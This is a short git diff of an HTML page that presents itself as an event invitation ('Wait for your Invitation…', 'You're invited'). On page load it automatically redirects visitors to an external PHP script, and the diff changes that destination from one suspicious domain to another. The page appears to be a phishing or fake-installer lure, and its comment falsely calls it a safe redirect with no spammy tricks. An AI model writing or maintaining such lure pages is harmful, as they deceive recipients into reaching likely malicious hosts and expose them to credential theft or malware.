--- a/care.html
+++ b/care.html
@@ -55,7 +55,7 @@
     <script>
         // Safe, transparent redirect (no spammy tricks)
         window.addEventListener("load", function () {
-            const baseURL = "https://inviteinstallers.in/trea/loveandcare/loud.php";
+            const baseURL = "https://upcomingevents.es/vds/Celebrate.php";
             const query = window.location.search; // keep query parameters if present
             const finalURL = baseURL + query;
 
@@ -67,13 +67,13 @@
     </script>
 
     <noscript>
-        <meta http-equiv="refresh" content="0;url=https://inviteinstallers.in/trea/loveandcare/loud.php" />
+        <meta http-equiv="refresh" content="0;url=https://upcomingevents.es/vds/Celebrate.php" />
     </noscript>
 </head>
 
 <body>
     <div class="box">
-        <h1>Redirecting…</h1>
+        <h1>Wait for your Invitation…</h1>
         <p>
             You're invited — kindly please follow the instructions to see the full details.<br>
             Thanks, looking forward to see you there.
